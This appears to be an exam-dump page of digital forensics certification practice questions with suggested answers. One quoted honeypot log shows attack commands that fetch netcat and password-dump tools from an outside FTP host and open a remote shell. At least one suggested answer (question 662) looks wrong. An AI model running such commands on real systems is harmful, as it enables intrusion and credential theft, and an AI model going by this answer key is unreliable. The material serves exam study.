ExamGecko
Search Search Login
Home Home / ECCouncil / 312-49v10

ECCouncil 312-49v10 Practice Test - Questions Answers, Page 67

Question list
Search
Search

List of questions

Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

Report writing is a crucial stage in the outcome of an investigation. Which information should not be included in the report section?
William is examining a log entry that reads 192.168.0.1 - - [18/Jan/2020:12:42:29 +0000) "GET / HTTP/1.1" 200 1861. Which of the following logs does the log entry belong to?
During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore, you report this evidence. This type of evidence is known as:
What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?
In Windows, prefetching is done to improve system performance. There are two types of prefetching: boot prefetching and application prefetching. During boot prefetching, what does the Cache Manager do?
In which of these attacks will a steganalyst use a random message to generate a stego-object by using some steganography tool, to find the steganography algorithm used to hide the information?
An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that that the employee was in possession of the proprietary information?
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below. "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given?
You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case?
Which of the following is a precomputed table containing word lists like dictionary files and brute force lists and their hash values?

Question 661

Report
Export
Collapse

You are an information security analyst at a large pharmaceutical company. While performing a routine review of audit logs, you have noticed a significant amount of egress traffic to various IP addresses on destination port 22 during off- peak hours. You researched some of the IP addresses and found that many of them are in Eastern Europe. What is the most likely cause of this traffic?

A.
Malicious software on internal system is downloading research data from partner 5FTP servers in Eastern Europe
A.
Malicious software on internal system is downloading research data from partner 5FTP servers in Eastern Europe
Answers
B.
Internal systems are downloading automatic Windows updates
B.
Internal systems are downloading automatic Windows updates
Answers
C.
Data is being exfiltrated by an advanced persistent threat (APT)
C.
Data is being exfiltrated by an advanced persistent threat (APT)
Answers
D.
The organization's primary internal DNS server has been compromised and is performing DNS zone transfers to malicious external entities
D.
The organization's primary internal DNS server has been compromised and is performing DNS zone transfers to malicious external entities
Answers
Suggested answer: C

Question 662

Report
Export
Collapse

Choose the layer in iOS architecture that provides frameworks for iOS app development?

A.
Media services
A.
Media services
Answers
B.
Cocoa Touch
B.
Cocoa Touch
Answers
C.
Core services
C.
Core services
Answers
D.
Core OS
D.
Core OS
Answers
Suggested answer: C

Question 663

Report
Export
Collapse

Data density of a disk drive is calculated by using_______

A.
Slack space, bit density, and slack density.
A.
Slack space, bit density, and slack density.
Answers
B.
Track space, bit area, and slack space.
B.
Track space, bit area, and slack space.
Answers
C.
Track density, areal density, and slack density.
C.
Track density, areal density, and slack density.
Answers
D.
Track density, areal density, and bit density.
D.
Track density, areal density, and bit density.
Answers
Suggested answer: D

Question 664

Report
Export
Collapse

Web browsers can store relevant information from user activities. Forensic investigators may retrieve files, lists, access history, cookies, among other digital footprints. Which tool can contribute to this task?

A.
Most Recently Used (MRU) list
A.
Most Recently Used (MRU) list
Answers
B.
MZCacheView
B.
MZCacheView
Answers
C.
Google Chrome Recovery Utility
C.
Google Chrome Recovery Utility
Answers
D.
Task Manager
D.
Task Manager
Answers
Suggested answer: B

Question 665

Report
Export
Collapse

For the purpose of preserving the evidentiary chain of custody, which of the following labels is not appropriate?

A.
Relevant circumstances surrounding the collection
A.
Relevant circumstances surrounding the collection
Answers
B.
General description of the evidence
B.
General description of the evidence
Answers
C.
Exact location the evidence was collected from
C.
Exact location the evidence was collected from
Answers
D.
SSN of the person collecting the evidence
D.
SSN of the person collecting the evidence
Answers
Suggested answer: D

Question 666

Report
Export
Collapse

This is a statement, other than one made by the declarant while testifying at the trial or hearing, offered in evidence to prove the truth of the matter asserted. Which among the following is suitable for the above statement?

A.
Testimony by the accused
A.
Testimony by the accused
Answers
B.
Limited admissibility
B.
Limited admissibility
Answers
C.
Hearsay rule
C.
Hearsay rule
Answers
D.
Rule 1001
D.
Rule 1001
Answers
Suggested answer: C

Question 667

Report
Export
Collapse

The information security manager at a national legal firm has received several alerts from the intrusion detection system that a known attack signature was detected against the organization's file server. What should the information security manager do first?

A.
Report the incident to senior management
A.
Report the incident to senior management
Answers
B.
Update the anti-virus definitions on the file server
B.
Update the anti-virus definitions on the file server
Answers
C.
Disconnect the file server from the network
C.
Disconnect the file server from the network
Answers
D.
Manually investigate to verify that an incident has occurred
D.
Manually investigate to verify that an incident has occurred
Answers
Suggested answer: C

Question 668

Report
Export
Collapse

Which of the following is the most effective tool for acquiring volatile data from a Windows-based system?

A.
Coreography
A.
Coreography
Answers
B.
Datagrab
B.
Datagrab
Answers
C.
Ethereal
C.
Ethereal
Answers
D.
Helix
D.
Helix
Answers
Suggested answer: D

Question 669

Report
Export
Collapse

Which of the following directory contains the binary files or executables required for system maintenance and administrative tasks on a Linux system?

A.
/sbin
A.
/sbin
Answers
B.
/bin
B.
/bin
Answers
C.
/usr
C.
/usr
Answers
D.
/lib
D.
/lib
Answers
Suggested answer: A

Question 670

Report
Export
Collapse

Which set of anti-forensic tools/techniques allows a program to compress and/or encrypt an executable file to hide attack tools from being detected by reverse-engineering or scanning?

A.
Packers
A.
Packers
Answers
B.
Emulators
B.
Emulators
Answers
C.
Password crackers
C.
Password crackers
Answers
D.
Botnets
D.
Botnets
Answers
Suggested answer: A
Total 704 questions
Go to page: of 71
ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms